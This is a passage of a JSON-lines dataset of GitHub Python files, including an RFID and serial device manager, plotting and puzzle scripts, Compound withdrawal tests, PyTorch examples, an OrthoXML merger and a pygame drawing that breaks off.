InputDevice\nfrom select import select\n\n# local imports\nfrom common import *\n\n# Constants\n#\nUSB_PORT_PREFIX = \"/dev/ttyUSB\"\nMAX_USB_PORTS = 12\nRFID_SEND_COUNT = 3\nRFID_LENGTH = 29\nMAX_RETRIES = 20\nRETRY_DELAY = 0.5\nSERIAL_TIMEOUT = 0.5\n\n# communication protocols\nREQ_ID = \"id\"\nREQ_START = \"start\"\nREQ_STOP = \"stop\"\nRSP_ACK = \"OK\"\nREQ_HANDSHAKE = \"hello?\"\nRSP_HANDSHAKE = \"hello!\"\n\n# id's\nID_RFID = \"id:rfid\"\nID_CHART = \"id:chart\"\n\nscancodes = {\n # Scancode: ASCIICode\n 0: None, 1: u'ESC', 2: u'1', 3: u'2', 4: u'3', 5: u'4', 6: u'5', 7: u'6', 8: u'7', 9: u'8',\n 10: u'9', 11: u'0', 12: u'-', 13: u'=', 14: u'BKSP', 15: u'TAB', 16: u'q', 17: u'w', 18: u'e', 19: u'r',\n 20: u't', 21: u'y', 22: u'u', 23: u'i', 24: u'o', 25: u'p', 26: u'[', 27: u']', 28: u'CRLF', 29: u'LCTRL',\n 30: u'a', 31: u's', 32: u'd', 33: u'f', 34: u'g', 35: u'h', 36: u'j', 37: u'k', 38: u'l', 39: u';',\n 40: u'\"', 
41: u'`', 42: u'LSHFT', 43: u'\\\\', 44: u'z', 45: u'x', 46: u'c', 47: u'v', 48: u'b', 49: u'n',\n 50: u'm', 51: u',', 52: u'.', 53: u'/', 54: u'RSHFT', 56: u'LALT', 57: u' ', 100: u'RALT'\n}\n\n#\n# Globals\n#\n\n# serial device handles\ndevices = {'rfid': {'key': 'rfid',\n 'name': 'RFID Reader',\n 'id': 'id:rfid',\n 'fault': 'critical',\n 'status': 'init',\n 'port': '/dev/input/by-id/usb-Sycreader_RFID_Technology_Co.__Ltd_SYC_ID_IC_USB_Reader_08FF20140315-event-kbd',\n 'port-status': 'fixed',\n 'sort': 1\n },\n 'chart1': {'key': 'chart1',\n 'name': 'Chart Recorder 1',\n 'id': 'id:chart',\n 'fault': 'warn',\n 'status': 'init',\n 'port': '',\n 'port-status': 'variable',\n 'sort': 2\n },\n 'chart2': {'key': 'chart2',\n 'name': 'Chart Recorder 2',\n 'id': 'id:chart',\n 'fault': 'silent',\n 'status': 'init',\n 'port': '',\n 'port-status': 'variable',\n 'sort': 3\n }\n }\n\nassigned_ports = []\n\n# a place to store our rfid as we receive it\nrfid_in = \"\"\n\n# timers\nchart_timer = \"\"\n\n\n#\n# Device locating and setup\n#\n\ndef sorted_devices():\n \"\"\"Return list of devices sorted by sort order values in devices dictionary\"\"\"\n return sorted(devices.values(), key=lambda x: x['sort'])\n\n\ndef is_port_active(port):\n \"\"\"Check if given port is active.\n Note if no part is passed, it returns False\"\"\"\n if (port):\n # report(\"Checking if %s is active:\" % (port))\n # we use a system call to see if this serial handle exists\n return os.path.exists(port)\n\n\ndef get_active_usb_ports():\n \"\"\"Search usb ports and find out which ones are active, returning a list\"\"\"\n usb_list = []\n # we look for up to max_ports usb ports\n for port_num in range(MAX_USB_PORTS):\n usb_port = USB_PORT_PREFIX + str(port_num)\n if is_port_active(usb_port):\n usb_list.append(usb_port)\n return usb_list\n\n\ndef request_id_from_device(port):\n \"\"\"Send an ID request to a serial port and return the ID we get\"\"\"\n # we only want to check port if it is still active\n if 
(is_port_active(port)):\n # set up a serial port temporarily\n ser = serial.Serial(port, 9600, timeout=SERIAL_TIMEOUT)\n # clear the buffers - TODO: Does this actually do it?\n ser.reset_input_buffer()\n ser.reset_output_buffer()\n # we ask several times until we get an answer\n for i in range(MAX_RETRIES):\n ser.write(REQ_ID)\n sleep(RETRY_DELAY)\n waiting = ser.inWaiting()\n response = ser.readline().strip()\n # report(\"Serial Try\", i, \"=\", response, \"waiting:\", waiting)\n if response:\n break\n sleep(RETRY_DELAY)\n return response\n # otherwise return empty string\n return \"\"\n\n\ndef setup_devices():\n \"\"\"Set up all of our serial ports connected to our devices\"\"\"\n # report(\"Checking for active ports\")\n try:\n usb_ports = get_active_usb_ports()\n # First we assign all of our fixed port devices\n for device in sorted_devices():\n if (device['port-status'] == 'fixed' and device['status'] != 'live') and \\\n is_port_active(device['port']):\n debug(\"Unassigned device:\", device['name'])\n report(\"Setting up %s, ID: %s, Port: %s\" % (device['name'],\n device['id'], device['port']))\n # asign a handle\n device['handle'] = InputDevice(device['port'])\n # add port to our assigned port list\n if device['port'] not in assigned_ports:\n assigned_ports.append(device['port'])\n # mark is as currently live\n device['status'] = 'live'\n # Now we assign all of our variable port devices\n for port in usb_ports:\n debug(\"Active ports:\", str(usb_ports), level=3)\n debug(\"Registered ports:\", str(assigned_ports), level=3)\n # if this port isn't already assigned\n if (port not in assigned_ports):\n debug(\"Unassigned port:\", port)\n #\n # look through our list of expected devices\n for device in sorted_devices():\n # if the device is not fixed port and not already live\n if (device['port-status'] != 'fixed' and not is_port_active(device['port'])):\n debug(\"Unassigned device:\", device['name'])\n # if device IDs as this device\n response = 
request_id_from_device(port)\n debug(\"Response: \", response)\n if (device['id'] in response):\n report(\"Setting up %s, ID: %s, Port: %s\" % (device['name'],\n response, port))\n # asign a serial handle\n device['handle'] = serial.Serial(port, 9600, timeout=.5)\n # assign the port name\n device['port'] = port\n # add port to our assigned port list\n if port not in assigned_ports:\n assigned_ports.append(port)\n # mark is as currently live\n device['status'] = 'live'\n # we don't need to look through the rest of the\n # devices\n break\n # we continue looking through the active ports\n except IOError:\n report(\"WARNING: Setup error, retrying\")\n sleep(1)\n setup_devices()\n\n\ndef all_devices_live():\n \"\"\"Check if each device handle is still valid.\n Note that a fault with some critical devices will pause\n any further action, while others just generate a warning.\n Still other devices are optional and will just silently fail.\"\"\"\n devices_ok = True\n # we iterate over the list of possible devices\n for device in sorted_devices():\n # check if port is active. 
Note if we lost the port previously and it is empty\n # is_port_active() returns False\n if not is_port_active(device['port']):\n # devices['chart']['live'] = False\n if (device['fault'] == 'critical'):\n # at intervals we report this\n update(\"CRITICAL: %s disconnected.\" % device['name'])\n elif (device['fault'] == 'warn'):\n # at intervals we report this\n update(\"WARNING: %s disconnected.\" % device['name'])\n # set status for this device\n device['status'] == 'missing'\n # unassign port\n if device['port-status'] != \"fixed\":\n device['port'] == ''\n # remove port from our assigned port list\n if device['port'] in assigned_ports:\n assigned_ports.remove(device['port'])\n devices_ok = False\n return devices_ok\n\n\ndef all_critical_devices_live():\n \"\"\"Quick check if critical devices are live relies on side effects of check_if_all_devices_live()\"\"\"\n critical_ok = True\n for device in sorted_devices():\n if device['fault'] == 'critical' and device['status'] != 'live':\n critical_ok = False\n break\n return critical_ok\n\n#\n# device communication\n#\n\n\ndef tell_device(device, text):\n ser = devices[device]['handle']\n try:\n ser.reset_input_buffer()\n ser.reset_output_buffer()\n ser.write(text)\n sleep(RETRY_DELAY)\n response = ser.readline().strip()\n except:\n response = None\n return response\n # for i in range(MAX_RETRIES):\n # ser.write(text)\n # sleep(RETRY_DELAY)\n # try:\n # waiting = ser.inWaiting()\n # response = ser.readline().strip()\n # except:\n # pass\n # # report(\"Serial Try\", i, \"=\", response, \"waiting:\", waiting)\n # if response in locals() and RSP_ACK in response:\n # return response\n # sleep(RETRY_DELAY)\n\n\n#\n# Outside world actions & communication\n#\n\ndef display_found_object(data):\n title = data[\"title\"]\n category = data[\"category\"]\n url = youtube_url + data[\"video\"] + youtube_post\n report(\"This is a\", title)\n report(\"Showing video\", url)\n # browser.get(url)\n\n\ndef start_chart(time):\n \"\"\"Start 
chart recorders and set callback timer to turn it off\"\"\"\n global chart_timer\n # first we cancel any timer we've set before\n if (chart_timer):\n chart_timer.cancel()\n report(\"Canceling old timer\")\n # tell every connected chart recorder to start\n for device in sorted_devices():\n if 'chart' in device['key'] and is_port_active(device['port']):\n results = tell_device(device['key'], REQ_START)\n report(\"Starting %s. It responds: %s\" % (device['name'], results))\n chart_timer = threading.Timer(time, stop_chart).start()\n\n\ndef stop_chart():\n \"\"\"Stops chart recorders\"\"\"\n for device in sorted_devices():\n if 'chart' in device['key'] and is_port_active(device['port']):\n results = tell_device(device['key'], REQ_STOP)\n report(\"Stopping %s. It responds: %s\" % (device['name'], results))\n\n\ndef listen_and_report():\n \"\"\"Do our main loop actions, particularly listening to the\n RFID reader and triggering actions\"\"\"\n global rfid_in\n result = None \n rfid_good = None \n try:\n update(\"Listening for RFID\")\n rfid_device = devices['rfid']['handle']\n r,w,x = select([rfid_device], [], [])\n for event in rfid_device.read():\n if event.type == 1 and event.value == 1:\n key = scancodes[event.code]\n if key != 'CRLF':\n if key.isdigit():\n rfid_in += \"%02d:\" % int(key)\n debug(\"Key: %s ID: %s\" % (key, rfid_in), level=2)\n else:\n rfid_in = rfid_in[0:-1]\n debug(\"Full id received: %s\" % (rfid_in))\n # if the rfid has the proper length,\n # we can trust it\n if len(rfid_in) == RFID_LENGTH:\n rfid_good = rfid_in\n report(\" Received good RFID:\", rfid_in)\n else:\n report(\" Received bad RFID:\", rfid_in)\n rfid_in = \"\"\n if rfid_good:\n report(\"RFID found:\", rfid_good)\n # clear incoming buffer in case we have stuff waiting\n # rfid_device.reset_input_buffer()\n # rfid_device.flushInput()\n #report(\"Continue listening for RFID\")\n # # do we have data on the input buffer waiting\n # if rfid_device.in_waiting > 0:\n # # if we send the same 
rfid multiple times\n # # in theory they should all be the same,\n # # but in practice we are sometimes missing bytes.\n # # Thus we send it multiple times to guard against data loss\n # rfid_good = \"\"\n # count = 0\n # # we keep looking if we have something waiting\n # # AND we haven't exceeded our count\n # # AND we haven't already rec'd a good rfid\n # while (rfid_device.in_waiting > 0 and count < RFID_SEND_COUNT and\n # not rfid_good):\n # rfid_in = rfid_device.readline().strip()\n # # if the rfid has the proper length,\n # # we can trust it\n # if len(rfid_in) == RFID_LENGTH:\n # rfid_good = rfid_in\n # report(\" Received good RFID:\", rfid_in)\n # else:\n # report(\" Received bad RFID:\", rfid_in)\n # if rfid_good:\n # report(\"RFID found:\", rfid_good)\n # result = get_rfid_data(rfid_good)\n # # clear incoming buffer in case we have stuff waiting\n # rfid_device.reset_input_buffer()\n # rfid_device.flushInput()\n # report(\"Continue listening for RFID\")\n except IOError:\n update(\"WARNING: Lost RFID device\")\n return(rfid_good)\n\n\ndef main():\n setup_devices()\n # This is our main loop that listens and responds\n while 1:\n # check if all of our devices are active\n if not all_devices_live():\n setup_devices()\n # let's take actions if we can\n if all_critical_devices_live():\n listen_and_report()\n\n\nif __name__ == '__main__':\n try:\n # Enter the main loop\n main()\n except KeyboardInterrupt:\n report(\"\")\n report(\"Exiting.\")\n # except Exception as e:\n # print \"\"\n # print str(e)\n # except:\n","repo_name":"wmodes/auratic","sub_path":"master/devices.py","file_name":"devices.py","file_ext":"py","file_size_in_byte":14412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"35098650286","text":"import json\nimport os\nfrom matplotlib import pyplot as plt\nfrom collections import OrderedDict\n\nresults_list = []\nroot = \"outputs/\"\n\nfor root, dir, files in os.walk(root):\n for dirname 
in sorted(dir):\n f_root = root + dirname + \"/\" + \"training_data.json\"\n with open(f_root, \"rb\") as f:\n data = json.load(f) \n results_list.append((dirname, data))\n \nresults_dicts = OrderedDict(results_list)\n\nfigure = plt.figure(figsize=(1,1))\nrows = 1\ncolumns = 1\nh = 50\nw = 50\ncount = 1\nfor key, val in results_dicts.items():\n \n epochs = list(range(1, len(val[\"train_loss\"])+1))\n \n ax = figure.add_subplot(rows, columns, count)\n count += 1\n ax.plot(epochs, val[\"train_loss\"], label = \"training_total\", color = \"#0000FF\")\n ax.plot(epochs, val[\"val_loss\"], label = \"val_total\", color = \"#EE4B2B\")\n ax.scatter(val[\"best_epoch\"][-1]+1, val[\"best_loss\"][-1], c = \"g\", marker = \"o\")\n\n ax.set_xlabel(\"Number of Epochs\")\n ax.set_ylabel(\"Loss Value\")\n\n plt.title(key)\n best_label = str(round(val[\"best_loss\"][-1], 3)) + \" @ \" + str(val[\"best_epoch\"][-1])\n plt.annotate(best_label, (val[\"best_epoch\"][-1], val[\"best_loss\"][-1]))\n #step_label = str(round(val[\"step_mAP\"][0], 3)) + \" @ \" + str(val[\"step_epoch\"][0])\n #plt.annotate(step_label, (val[\"step_epoch\"][0], val[\"step_mAP\"][0]))\n\nfigure.legend(loc=\"upper right\")\nplt.show()","repo_name":"14472506/self_supervised_vision","sub_path":"Archive/data_plotting.py","file_name":"data_plotting.py","file_ext":"py","file_size_in_byte":1388,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"37303266598","text":"from . import fac_to_itin\n\ndef find_one(n, fac_perm, iter, distance_min, memo, xys, inter_town_distances):\n d_iter = round(fac_perm * 0.05)\n\n \"\"\" Below are descriptions of the lines. All positions are expressed in half-feet, relative to an origin at the middle of the baseline. 
All lines point in positive direction (either x or y).\n 0: left-outside alley\n 1: left-inside alley\n 2: back of service line\n 3: bisector of service boxes\n 4: baseline\n 5: right-inside alley\n 6: right-outside alley\n \"\"\"\n\n dx1 = 27\n dx2 = 36\n dy1 = 36\n dy2 = 78\n\n xy = (((-dx2, 0),(-dx2,dy2)), \\\n ((-dx1, 0),(-dx1,dy2)), \\\n ((-dx1,dy1),( dx1,dy1)), \\\n (( 0,dy1),( 0,dy2)), \\\n ((-dx2, 0),( dx2, 0)), \\\n (( dx1, 0),( dx1,dy2)), \\\n (( dx2, 0),( dx2,dy2)))\n\n # loop over all permutations (ie, all possible itineraries)\n while iter < fac_perm:\n # salesperson starts at origin, which n-th point (0-based indexing) is defined to be.\n index_last = n\n distance_tot = 0\n # let dIter = Math.round(facPerm/1000)\n itin = fac_to_itin.fac_to_itin(n, iter)\n # flag used to determine whether or not memo can be used\n are_same = True\n for i in range(len(itin)):\n index = itin[i]\n are_same = are_same and memo and len(memo) > i and memo[i][0] == index\n # ... if existing element in memo cannot be used, then reassign it\n if not are_same:\n pair = [index, distance_tot + inter_town_distances[index_last][index]]\n if len(memo) > i:\n memo[i] = pair\n else:\n memo.append(pair)\n distance_tot = memo[i][1]\n index_last = index\n # salesperson ends at the origin, which is n-th point.\n distance_tot += inter_town_distances[index_last][n]\n itin.insert(0, n)\n itin.append(n)\n # Return if you find the next minimum of the search.\n if distance_tot < distance_min:\n return {\"iter\": iter, \"itin\": itin, \"distance_min\": distance_tot, \"memo\": memo, \"finished\": False}\n # Return to provide an update on progress (the next 5%).\n if not iter % d_iter:\n return {\"iter\": iter, \"finished\": False}\n iter += 1\n return {\"finished\": 
True}\n","repo_name":"pknipp/line_sweeping_back","sub_path":"line_sweeping/find_one.py","file_name":"find_one.py","file_ext":"py","file_size_in_byte":2185,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"17368938211","text":"import pytest\n\n\n@pytest.fixture(scope=\"function\", autouse=True)\ndef deposited(compound, USDC):\n to_deposit_usdc = 100_000 * 10 ** USDC.decimals()\n compound.deposit(USDC, to_deposit_usdc)\n\n to_deposit_eth = 10 ** 18\n compound.deposit_eth(to_deposit_eth)\n\n\ndef test_withdraw(safe, compound, USDC, cUSDC):\n\n before_bal_usdc = USDC.balanceOf(safe)\n before_bal_cUSDC = cUSDC.balanceOf(safe)\n to_withdraw = 100_000 * 10 ** USDC.decimals()\n\n compound.withdraw(USDC, to_withdraw)\n\n assert USDC.balanceOf(safe) == before_bal_usdc + to_withdraw\n # Can be more precise by calculating Ctokens exchange rates\n assert cUSDC.balanceOf(safe) < before_bal_cUSDC\n\n\ndef test_withdraw_eth(safe, compound, cETH):\n\n before_bal_eth = safe.account.balance()\n before_bal_ceth = cETH.balanceOf(safe)\n\n to_withdraw = 10 ** 18\n\n compound.withdraw_eth(to_withdraw)\n\n assert safe.account.balance() == before_bal_eth + to_withdraw\n assert cETH.balanceOf(safe) < before_bal_ceth\n\n\ndef test_withdraw_ctoken(safe, compound, USDC, cUSDC):\n before_bal_usdc = USDC.balanceOf(safe)\n\n to_withdraw = cUSDC.balanceOf(safe)\n\n compound.withdraw_ctoken(cUSDC, to_withdraw)\n\n assert USDC.balanceOf(safe) > before_bal_usdc\n assert cUSDC.balanceOf(safe) == 0\n","repo_name":"Badger-Finance/badger-multisig","sub_path":"tests/compound/test_compound_withdraw.py","file_name":"test_compound_withdraw.py","file_ext":"py","file_size_in_byte":1278,"program_lang":"python","lang":"en","doc_type":"code","stars":36,"dataset":"github-code","pt":"44"} +{"seq_id":"33059635578","text":"from django.urls import path\nfrom .views import authenticate_user, UserRetrieveUpdateAPIView, RoleAPIView, UserAPIView, 
Current_User\n\n\nurlpatterns = [\n path('auth', authenticate_user),\n path('current_user/', Current_User),\n path('role/', RoleAPIView.as_view()),\n path('role//', RoleAPIView.as_view()),\n path('userm/', UserAPIView.as_view()),\n path('userm//', UserAPIView.as_view()),\n\n]\n","repo_name":"rahulkranjan/thaatee_learning","sub_path":"users/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"32762447243","text":"import tkinter as tk\nimport tkinter.messagebox as mb\n\nroot = tk.Tk()\nroot.title(\"Height calculator tool\")\nroot.grid()\n\nspace1 = tk.Label(root).grid(row=0,column=0)\nspace2 = tk.Label(root).grid(row=2, column=0)\n\nlabel1 = tk.Label(root, text=\"Input your height \").grid(row=1,column=0)\nentry = tk.Entry(root); entry.grid(row=1, column=1)\nlabel2 = tk.Label(root, text=\"cm\").grid(row=1,column=2)\n\ndef solve():\n global entry\n mb.showinfo(\"Result\", f\"Your height is {entry.get()} cm!\")\n \nbutton = tk.Button(root, text=\"Solve\", command=solve).grid(row=3, column=2)\n\nroot.mainloop()","repo_name":"Fabetsol/Bonjour-nous-sommes-vendredi","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":582,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"12578077974","text":"import re\nimport os\n\nabs_file_path = os.path.abspath(\"../output_files/outfile_inter.txt\");\n#abspath = os.getcwd()\n#print(abspath)\n#print(__file__)\ntext_file = open(abs_file_path,\"r\");\ntext_file = text_file.readlines();\ntext_file = ' '.join(text_file)\n\nacronym_list = set([x.group() for x in re.finditer(r'\\b[A-Z](?=([&.]?))(?:\\1[A-Z]){1,5}\\b', 
text_file)])\n\nprint(acronym_list)","repo_name":"Shilpa39/Py_Acronym_processing","sub_path":"source_files/text_to_acronyms.py","file_name":"text_to_acronyms.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"22050724506","text":"source_url = \"https://towardsdatascience.com/google-foobar-challenge-level-2-7a021f625c1\"\n\n\nimport re\ndef solution(s):\n no_dash = re.sub('-', '', s)\n\n # find number of salutes for walkers going right\n answer = 0\n for ind, direction in enumerate(no_dash):\n if direction == '>':\n people_in_front = no_dash[ind:]\n left_walkers = people_in_front.count('<')\n\n answer += left_walkers * 2\n\n return answer\n","repo_name":"1969-07-20/GoogleFoobarChallenge","sub_path":"OfflineTester/Level2_EnRouteSalute/solution3.py","file_name":"solution3.py","file_ext":"py","file_size_in_byte":453,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"5170998796","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\ndef unpickle(file):\n import cPickle\n fo = open(file, 'rb')\n dict = cPickle.load(fo)\n fo.close()\n return dict\n\ndict = unpickle('data_batch_1')\ntr_N = len(dict['data'])\nX = np.zeros((tr_N, 32, 32, 3), dtype=np.uint8)\ny = np.zeros(tr_N, dtype=np.int64)\n\nfor i in range(tr_N):\n X[i] = dict['data'][i].reshape((32, 32, 3), order = 'F')\n y[i] = dict['labels'][i]\n\nprint(X)\nprint(y)\nplt.imshow(X[0])\nplt.show()","repo_name":"jxzhuge12/cse253","sub_path":"cse253hw3/showImage.py","file_name":"showImage.py","file_ext":"py","file_size_in_byte":476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"74058277254","text":"import torch\nimport torch.nn as nn\nfrom collections import OrderedDict\n\nseq_model = nn.Sequential(\n nn.Linear(1, 11),\n nn.Tanh(),\n nn.Linear(11, 1)\n )\n\nnamedseq_model = 
nn.Sequential(OrderedDict([\n ('hidden_linear', nn.Linear(1, 13)),\n ('hidden_activation', nn.Tanh()),\n ('output_linear', nn.Linear(13, 1))\n ]))\n\nclass SelfSubModule(nn.Module):\n def __init__(self):\n super().__init__()\n self.hidden_linear = nn.Linear(1, 8)\n self.hidden_activation = nn.Tanh()\n self.output_linear = nn.Linear(8, 1)\n #assigning an instance of nn.Module to an attribute in a nn.Module, as you did in the constructor here, automatically registers the module as a submodule, which gives modules(SelfSubModule) access to the parameters of its submodules(hidden_linear, hidden_activation, output_linear) without further action by the user.\n def forward(self, input): #input is the input data\n hidden_t = self.hidden_linear(input)\n activated_t = self.hidden_activation(hidden_t)\n output_t = self.output_linear(activated_t)\n return output_t\n\nsubclass_model = SelfSubModule()\n#what happens below is that the named_parameters() call delves into all submodules assigned as attributes in the constructor and recursively calls named_parameters() on each one of them.\nfor type_str, model in [('seq', seq_model), ('namedseq', namedseq_model), ('subclass', subclass_model)]:\n print(type_str)\n for name_str, param in model.named_parameters():\n print(\"{:21} {:19}\".format(name_str, str(param.shape)))\n print()\n\nprint('hidden_activation:', subclass_model.hidden_activation) ##The Tanh() module can be accessed as an attribute using the given name:\"hidden_activation\".\n","repo_name":"chengliu-LR/notebooks-Colab","sub_path":"PyTorch/dlwpt_5_nn_subclassing.py","file_name":"dlwpt_5_nn_subclassing.py","file_ext":"py","file_size_in_byte":1775,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"37223836370","text":"from xml.etree import ElementTree as ET\nfrom typing import List, Iterable\nfrom random import randint\n\n\n\nclass GeneRefManager:\n def __init__(self):\n self.xrefs = {}\n self.ids = set([])\n\n def 
_random_unused_id(self):\n while True:\n cand = randint(100000, 1000000000)\n if str(cand) not in self.ids:\n return str(cand)\n\n def register_and_reassign(self, gene_nodes:Iterable[ET.Element]):\n update_ids = {}\n to_rem = []\n for gene in gene_nodes:\n if gene.attrib['id'] in self.ids:\n if gene.attrib['protId'] in self.xrefs:\n # protId already in set. is it unique? if yes, no action, otherwise error\n if self.xrefs[gene.attrib['protId']] != gene.attrib['id']:\n raise ValueError(\"protId '{}' is used several times with different gene id :'{},'{}'\"\n .format(gene.attrib['protId'], self.xrefs[gene.attrib['protId']], gene.attrib['id']))\n else:\n to_rem.append(gene.attrib['id'])\n continue\n else:\n # reassign internal gene id.\n new_id = self._random_unused_id()\n update_ids[gene.attrib['id']] = new_id\n gene.attrib['id'] = new_id\n\n self.xrefs[gene.attrib['protId']] = gene.attrib['id']\n self.ids.add(gene.attrib['id'])\n return update_ids, to_rem\n\n\nclass Merger:\n def __init__(self, first):\n self.NS = \"http://orthoXML.org/2011/\"\n ET.register_namespace(\"\", self.NS)\n self.doc = ET.parse(first)\n self.root = self.doc.getroot()\n\n self.all_species = set(z.attrib['name'] for z in self.doc.findall('./{{{}}}species'.format(self.NS)))\n self.all_genes = GeneRefManager()\n self.all_genes.register_and_reassign(\n self.doc.findall(\"./{{{0}}}species/{{{0}}}database/{{{0}}}genes/{{{0}}}gene\".format(self.NS))\n )\n\n def merge_file(self, other):\n gene_id_updates, to_rem = self.all_genes.register_and_reassign(\n other.findall(\"./{{{0}}}species/{{{0}}}database/{{{0}}}genes/{{{0}}}gene\".format(self.NS)))\n self._remove_unnecessary_genes(other, to_rem)\n self._update_geneRef_ids(other.find('./{{{}}}groups'.format(self.NS)), gene_id_updates)\n\n for sp in other.findall(\"./{{{}}}species\".format(self.NS)):\n if sp.attrib['name'] not in self.all_species:\n species_seen = False\n for i, el in enumerate(self.root):\n if el.tag == 
\"{{{}}}species\".format(self.NS):\n species_seen = True\n elif species_seen:\n break\n self.root.insert(i, sp)\n self.all_species.add(sp.attrib['name'])\n else:\n db = self.root.find(\"./{{{0}}}species[@name='{1}']/{{{0}}}database/{{{0}}}genes\".format(self.NS, sp.attrib['name']))\n for g in sp.iterfind(\".//{{{}}}gene\".format(self.NS)):\n db.append(g)\n grps = self.root.find(\"./{{{}}}groups\".format(self.NS))\n for g in other.find(\"./{{{}}}groups\".format(self.NS)):\n grps.append(g)\n\n def _update_geneRef_ids(self, root, gene_id_updates):\n for old_id, new_id in gene_id_updates.items():\n for g in root.iterfind(\".//{{{0}}}geneRef[@id='{1}']\".format(self.NS, old_id)):\n g.attrib['id'] = new_id\n\n def _remove_unnecessary_genes(self, root, to_rem):\n for e in to_rem:\n parent = root.find(\"./{{{0}}}species/{{{0}}}database/{{{0}}}genes/{{{0}}}gene[@id='{1}']/..\"\n .format(self.NS, e))\n child = parent.find(\"./{{{0}}}gene[@id='{1}']\".format(self.NS, e))\n parent.remove(child)\n\n\n\n\n def write(self, fh):\n self.doc.write(fh, xml_declaration=True, encoding=\"UTF-8\", default_namespace=None)\n\n\ndef merge_orthoxml_files(out, files):\n \"\"\"function to merge several orthoxml files into a single orthoxml file that contains all groups.\n\n This function combines several orthoxml files into a single orthoxml file that\n contains all the groups and maintains a valid definition block of the species\n and their genes. 
The protId attributes among all the orthoxml files need to be\n either unique or being at least assigned to the same internal gene id; in that\n case it is assumed that it is the same gene across the different files and it\n can be merged.\n if the gene id attribute is the same two or more orthoxml files, but their\n protId value is different, a new gene id value is generated and the geneRef\n values are updated accordingly.\n\n :param out: a path or a filehandle object where the combined orthoxml data should\n be written to.\n\n :param files: a list of paths or filehandle objects (of valid orthoxml format) that\n should be merged.\n\n \"\"\"\n\n first = files.pop()\n merger = Merger(first)\n for f in files:\n merger.merge_file(ET.parse(f).getroot())\n\n return merger.write(out)\n","repo_name":"DessimozLab/FastOMA","sub_path":"FastOMA/zoo/hog/orthoxml_merge.py","file_name":"orthoxml_merge.py","file_ext":"py","file_size_in_byte":5199,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"44"} +{"seq_id":"5253772697","text":"# Import a library of functions called 'pygame'\r\nimport pygame\r\n\r\n# Initialize the game engine\r\npygame.init()\r\n\r\n# Define some colors\r\nBLACK = (0, 0, 0)\r\nWHITE = (255, 255, 255)\r\nSKY_BLUE = (0, 225, 255)\r\nBLUE = (0, 150, 255)\r\nGREEN = (0, 255, 0)\r\nRED = (255, 0, 0)\r\nOCEAN_GREEN = (11, 160, 89)\r\nYELLOW = (250, 220, 8)\r\nORANGE = (250, 180, 8)\r\n\r\nPI = 3.141592653\r\n\r\n# Set the height and width of the screen\r\nsize = (700, 500)\r\n\r\n# Create the screen\r\nscreen = pygame.display.set_mode(size)\r\n\r\n# Name te screen\r\npygame.display.set_caption(\"Ocean's sunset\")\r\n\r\n# Loop until the user clicks the close button.\r\ndone = False\r\n\r\n# Create a clock\r\nclock = pygame.time.Clock()\r\n\r\n# Loop as long as done == False\r\nwhile not done:\r\n for event in pygame.event.get(): # User did something\r\n if event.type == pygame.QUIT: # If user clicked close\r\n done = 
True # Flag that we are done so we exit this loop\r\n\r\n # Clear the screen and set the screen background\r\n screen.fill(WHITE)\r\n\r\n # Sky\r\n pygame.draw.line(screen, SKY_BLUE, [0 ,0], [0,250], 1500)\r\n\r\n # Sun\r\n pygame.draw.circle(screen, YELLOW, (225, 250), 130, 130)\r\n\r\n # Ocean\r\n pygame.draw.line(screen, BLUE, [0,250], [0, 500], 1500)\r\n\r\n # Birds\r\n for offset in range(90, 0, -30):\r\n pygame.draw.arc(screen, BLACK, [365 + offset, 100+ offset, 110, 100], PI/6, PI / 2, 2)\r\n pygame.draw.arc(screen, BLACK, [455+ offset, 100+ offset, 110, 100], PI/2, 5*PI/6, 2)\r\n\r\n # Sun's reflection on the ocean\r\n for y_offset in range(0, 100, 10):\r\n pygame.draw.line(screen, ORANGE, [100 + y_offset, 260 + y_offset], [350 - y_offset, 260 + y_offset], 5)\r\n\r\n # Sailing Boat\r\n pygame.draw.polygon(screen, WHITE, [[350, 300], [360, 300], [360, 280], [365, 300], [375, 300], [370, 303], [355, 303]], 5)\r\n\r\n # Clouds\r\n for offset in range (0,390,130):\r\n pygame.draw.ellipse(screen, WHITE, [250 + offset, 70, 50, 25], 10)\r\n pygame.draw.circle(screen, WHITE, (270 + offset, 80), 10, 10)\r\n pygame.draw.circle(screen, WHITE, (295 + offset, 80), 20, 20)\r\n pygame.draw.circle(screen, WHITE, (320 + offset, 80), 10, 10)\r\n pygame.draw.ellipse(screen, WHITE, [290 + offset, 70, 50, 25], 10)\r\n\r\n # Select the font to use, size, bold, italics\r\n font = pygame.font.SysFont('Calibri', 25, True, False)\r\n\r\n # Render the text. \"True\" means anti-aliased text.\r\n # Black is the color. 
